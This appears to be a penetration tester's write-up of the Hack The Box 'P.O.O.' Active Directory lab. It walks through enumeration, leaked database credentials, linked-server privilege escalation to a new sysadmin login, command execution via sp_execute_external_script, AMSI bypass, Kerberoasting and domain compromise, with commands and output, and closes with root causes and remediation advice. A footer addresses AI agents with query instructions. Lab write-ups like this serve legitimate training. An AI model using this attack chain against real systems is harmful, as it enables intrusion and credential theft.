# P.O.O ### Scope {% code overflow="wrap" %} ``` Professional Offensive Operations By [eks](https://app.hackthebox.com/home/users/profile/302) and [mrb3n](https://app.hackthebox.com/home/users/profile/2984) Professional Offensive Operations is a rising name in the cyber security world. Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware. P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies. The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way. Entry Point: `10.13.38.11` ``` {% endcode %} ### Hosts * 10.13.38.11 ### Scans ```bash # Initial port scan sudo nmap -p- -T4 $IP --open -oN initial.nmap PORT STATE SERVICE 80/tcp open http 1433/tcp open ms-sql-s # Service scan PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+ | ms-sql-ntlm-info: | 10.13.38.11:1433: | Target_Name: POO | NetBIOS_Domain_Name: POO | NetBIOS_Computer_Name: COMPATIBILITY | DNS_Domain_Name: intranet.poo | DNS_Computer_Name: COMPATIBILITY.intranet.poo | DNS_Tree_Name: intranet.poo |_ Product_Version: 10.0.17763 |_ssl-date: 2023-08-15T13:36:25+00:00; +5s from scanner time. | ms-sql-info: | 10.13.38.11:1433: | Version: | name: Microsoft SQL Server 2017 RTM+ | number: 14.00.2027.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: true |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2023-08-10T02:45:27 |_Not valid after: 2053-08-10T02:45:27 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 5s, deviation: 0s, median: 4s # WFUZZ # Seclists Target: http://10.13.38.11/FUZZ Total requests: 37050 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000379: 200 31 L 55 W 703 Ch "." 000002558: 200 50 L 156 W 10244 Ch ".DS_Store" 000010081: 200 31 L 55 W 703 Ch "iisstart.htm" 000011450: 200 50 L 156 W 10244 Ch ".ds_store" 000017145: 301 1 L 10 W 151 Ch ".Trashes" Target: http://10.13.38.11/FUZZ Total requests: 62284 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000003: 401 29 L 100 W 1293 Ch "admin" 000000024: 301 1 L 10 W 149 Ch "themes" 000000009: 301 1 L 10 W 145 Ch "js" 000000016: 301 1 L 10 W 150 Ch "plugins" 000000006: 301 1 L 10 W 152 Ch "templates" 000000002: 301 1 L 10 W 149 Ch "images" 000000070: 301 1 L 10 W 150 Ch "uploads" 000000127: 301 1 L 10 W 146 Ch "dev" 000000576: 301 1 L 10 W 150 Ch "widgets" 000001248: 301 1 L 10 W 151 Ch "META-INF" 000021033: 301 1 L 10 W 155 Ch "New Folder" # Metasploit shortname scanner msf6 auxiliary(scanner/http/iis_shortname_scanner) > run [*] Running module against 10.13.38.11 # path = / [*] Scanning in progress... [+] Found 5 directories [+] http://10.13.38.11/ds_sto*~1 [+] http://10.13.38.11/templa*~1 [+] http://10.13.38.11/trashe*~1 [+] http://10.13.38.11/newfol*~1 [+] http://10.13.38.11/newfol*~2 [+] Found 1 files [+] http://10.13.38.11/web*~1.con* [*] Auxiliary module execution completed # path = /dev/ [*] Scanning in progress... [+] Found 3 directories [+] http://10.13.38.11/dev/dca66d*~1 [+] http://10.13.38.11/dev/ds_sto*~1 [+] http://10.13.38.11/dev/304c0c*~1 [*] No files were found # Further look at the Dev DS Store wget 10.13.38.11/dev/.ds_store ``` ### Write-up The tester has found the default IIS web page on port 80. * ;
Using WFUZZ, the tester has found a few directories and one in particular seemed interesting, '/dev/'. Using the short name disclosure vulnerability, the contents of the directory has been revealed.
The tester was able to download the '.ds\_store' file within the 'dev' directory.
The other folders found resemble MD5 hashes, cracking those revealed the authors of this challenge. ```bash 304c0c90fbc6520610abbf378e2339d1 = mrb3n dca66d38fd916317687e1390a420c3fc = eks ``` Fuzzing further within those folders, revealed the following directories: ```bash # Command wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL" # Output Target: http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/FUZZ/ Total requests: 62284 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000041: 403 29 L 92 W 1233 Ch "include" 000000111: 403 29 L 92 W 1233 Ch "db" 000000234: 403 29 L 92 W 1233 Ch "core" 000000624: 403 29 L 92 W 1233 Ch "src" ``` Using the same vulnerability as before, the tester checked the 'db' directory.
A partial file name was found, the tester used WFUZZ to fuzz for the complete name. ```bash # Command grep '^co.*' /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt > fuzz.txt URL=http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt wfuzz -c -w ./fuzz.txt --hc 404 "$URL" # Output Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt Total requests: 2224 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000096: 200 6 L 7 W 142 Ch "connection" ``` Downloading the file, it contains a database username and password. ```bash # Command wget http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt ```
Knowing port 1433 was open from the initial scans, the tester tried to connect to the MS SQL database. ```bash # Command impacket-mssqlclient external_user:#p00XXXXXXXXXXXXX@10.13.38.11 ```
Database enumeration: ```bash # Databases select name from master.dbo.sysdatabases; name ---------- master tempdb POO_PUBLIC # Current user is not sysadmin select name,sysadmin from syslogins; name sysadmin ------------- -------- sa 1 external_user 0 # Finding any other linked servers select srvname, isremote from sysservers; srvname isremote ------------------------ -------- COMPATIBILITY\POO_PUBLIC 1 COMPATIBILITY\POO_CONFIG 0 # Executing enumeration on the linked server exec ('select suser_name()') at [COMPATIBILITY\POO_CONFIG]; ------------- internal_user # Checking if user is sysadmin exec ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG]; name sysadmin ------------- -------- sa 1 internal_user 0 # Checking for additonal links - looks like its a circular link exec ('select srvname, isremote from sysservers') at [COMPATIBILITY\POO_CONFIG]; srvname isremote ------------------------ -------- COMPATIBILITY\POO_CONFIG 1 COMPATIBILITY\POO_PUBLIC 0 # Checking what user it is linked as exec ('exec (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; -- sa ``` The tester found that 'POO\_PUBLIC' database is linked to the 'POO\_CONFIG' database using user 'internal\_user'. Additionally the database 'POO\_CONFIG' is linked back to 'POO\_PUBLIC' which creates a circular link, however, the last link is done using a sysadmin account. The tester then leveraged that connection to create a new sysadmin account in the 'POO\_PUBLIC' database. ```bash # Commands exec ('exec ('' CREATE LOGIN hackedAgain WITH PASSWORD = ''''LetMeIn123!'''' '') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; exec ('exec ('' sp_addsrvrolemember ''''hackedAgain'''' , ''''sysadmin'''' '') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; ``` Now the database can be enumerated further: ```bash # Command impacket-mssqlclient hackedAgain:'LetMeIn123!'@10.13.38.11 # DB Enumeration select name from master.dbo.sysdatabases; name ---------- master tempdb model msdb POO_PUBLIC flag select * from flag.INFORMATION_SCHEMA.TABLES; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- flag dbo flag b'BASE TABLE' ```
Now that access to a sysadmin is possible, the tester has used the stored procedure 'sp\_execute\_external\_script' to get remote code execution. ```bash # Command EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' # Output [*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: compatibility\poo_public01 ``` Using the above exploit, the tester was able to read the 'web.config' file enumerated earlier. ```bash # Command EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("type C:\inetpub\wwwroot\web.config "))' ```
This revealed the login for the administrator panel on the website at ';
Enumerating the system using the MSSQL account revealed additional ports open that weren't discovered previously. ```bash # Command EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("netstat -anop tcp"))' ```
The interesting port that stands out is 5985, however it is blocked by the firewall as it wasn't enumerated by nmap, so the next step was to check for IPV6. ```bash # Command EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("ipconfig"))' ```
Scanning the IPV6 address with 'nmap' has been successful and the firewall did not block the scan. ```bash # Command nmap -p 5985 -sV -6 dead:beef::1001 -oN 5985.nmap # Output PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` Using 'winrm', the tester was able to login as the administrator with the credentials found earlier. ```bash sudo nano /etc/hosts # Add folowing line dead:beef::1001 compatibility.htb # Connect with evilwinrm evil-winrm -i compatibility.htb -u administrator -p ```
The tester transferred 'sharphound' and once the tool ran, retrieved the output to the local attacking machine. ```bash # Upload sharphound using evil-winrm upload SharpHound.exe C:\Users\Public\s.exe # Run sharphound from the SQL interface xp_cmdshell C:\Users\Public\s.exe -C ALL --outputdirectory C:\Users\Public # Download output download C:\Users\Public\20230816220753_BloodHound.zip ``` The tester uploaded the files to the bloodhound UI for visualisation. Looking at the "Shortest path to Domain Admins from Kerberoastable users" has revealed that 'P00\_ADM' can be kerberoasted and is part of the "Domain Admins" group. !\[\[Pasted image 20230816202502.png]] The tester has used 'rubeus' to kerberoast the 'P00\_ADM' user. ```bash # Command from the SQL interface xp_cmdshell C:\Users\Public\Rubeus.exe kerberoast /user:p00_adm ```
Once the hash has been copied to a file and formatted to remove spaces and lines, 'hashcat' was used to crack the hash. ```bash # Command hashcat -a 0 -m 13100 p00_adm.hash /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force ```
The tester then transferred 'PowerView' across and used it to run commands on the DC using the credentials for the 'p00\_adm' user. ```bash # Run bypass 4MSI - prevents the current process to be scanned by the AV Bypass-4MSI # Set up credentials $pass = ConvertTo-SecureString 'ZQxxxxx' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass) # Testing Commands on DC Invoke-Command -Computer DC -Credential $cred -ScriptBlock { whoami; hostname } ## Output poo\p00_adm DC # Or could have used Enter-PSSession to get an interactive PowerShell Session Enter-PSSession -ComputerName DC -Credential $cred -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) # looking for flag Invoke-Command -Computer DC -Credential $cred -ScriptBlock { Get-ChildItem -recurse C:\ flag.txt } ```
```bash # Command to output flag Invoke-Command -Computer DC -Credential $cred -ScriptBlock { type C:\Users\mr3ks\Desktop\flag.txt ```
### Clean up * Delete MSSQL user created - 'hackedAgain' * Delete files created in the Public directory ```bash rm C:\Users\Public\s.exe rm C:\Users\Public\20230816220753_BloodHound.zip rm C:\Users\Public\Rubeus.exe rm C:\Users\Public\PowerView.ps1 ``` ### Root cause * Unpatched web server - IIS Server - Short File/Folder Name Disclosure * Credentials stored in clear text * Database login for external user (poo\_connection.txt) * Administrator login for web admin directory (web.config) * Directory traversal & externally open database * Database misconfiguration - circular link created with sysadmin user (POO\_Public -> POO\_Config -> POO\_Public) * Lack of strong password policies * Password reuse - Administrator Web login and local Administrator has same credentials * Domain Admin with easily crackable password * Incomplete firewall rules - not monitoring IPV6 * Kerberoastable domain admin * Domain admins should only be allowed to log onto domain controllers ### Executive Summary In light of the comprehensive cybersecurity assessment conducted on the organisation's systems, several critical root causes have been identified that pose significant risks to the information security. These findings require immediate attention and remediation to ensure the confidentiality, integrity, and availability of all digital assets. The following is a concise summary of the identified root causes: 1. **Unpatched Web Server:** The presence of unpatched vulnerabilities within the web server environment, specifically the IIS Server, exposes the systems to potential attacks. A publicly disclosed exploit has lead to unauthorised access and data leakage. 2. **Credentials Stored in Clear Text:** Storing sensitive credentials, such as database logins and administrator access, in clear text format is a critical security oversight. This makes these credentials easily exploitable by malicious actors who gain unauthorised access as showcased in the report. 3. **Exposed Database:** The presence of a database allowing open remote access creates a pathway for attackers to gain unauthorised access and potentially manipulate or ex filtrate sensitive data. 4. **Database Misconfiguration:** The discovered circular link in the database configuration, along with elevated user privileges, presents a significant threat to data integrity and system security. This allowed for lateral movement from a low lever user to the database admin. 5. **Incomplete Firewall Rules:** Inadequate firewall rules and failure to monitor IPV6 traffic exposed the network to potential unauthorised access and data breaches. 6. **Lack of Strong Password Policies:** The absence of robust password policies has led to various vulnerabilities, including password reuse and easily crackable passwords. 7. **Kerberoastable Domain Admin:** The presence of a Kerberoastable domain admin account increases the risk of credential theft and lateral movement within the network. 8. **Domain Admin Access Control:** Allowing domain admin accounts to log onto regular workstations remotely poses a significant security risk, as these accounts are highly privileged. In conclusion, the aforementioned root causes represent critical vulnerabilities that require immediate attention. Addressing these issues through a comprehensive and coordinated effort will significantly strengthen the cybersecurity posture, reduce the risk of unauthorised access and data breaches, and ultimately safeguard the organisation's digital assets. ### Recommendation * IIS Server Update - Immediate actions are required to ensure all server components are updated with the latest security patches. * Clear text passwords - Recommend implementing industry-standard encryption mechanisms to protect these credentials and review the Access Control Lists. * 'web.config' in the web server root directory. * 'poo\_connection.txt' in the user directories within the web server. * Externally open database - Proper access controls, input validation, and firewall configurations are crucial to mitigate this risk. If not required, block the port from being available remotely. * Currently available on port 1433 at the following IP, '10.13.38.11'. * Database Misconfiguration - Reconfiguring the database structure and user permissions is essential to mitigate the risk of unauthorised data access and manipulation. Ensure that the database links are created with low privilege users. * POO\_Config -> POO\_Public - remove the sysadmin account and replace with low privilege user. * Disallow the 'EXECUTE' function on low privilege users and remove unnecessary stored procedures such as 'sp\_execute\_external\_script'. * Password Policy - Adopting strong password policies, implementing password complexity requirements, and educating users about secure password practices are recommended to enhance the overall security posture. * Firewall rules - It's advised to review and update firewall rules to include IPV6 traffic monitoring, ensuring a comprehensive defence against external threats. * Domain Admins - Restricting domain admin logins to domain controllers exclusively will enhance security and minimise the potential attack surface. * Kerberoastable accounts - Implementing advanced authentication mechanisms and periodic account reviews will help mitigate the risk associated with such accounts. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentester-inc.gitbook.io/journey/pwned-machines/hack-the-box-htb/p.o.o.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.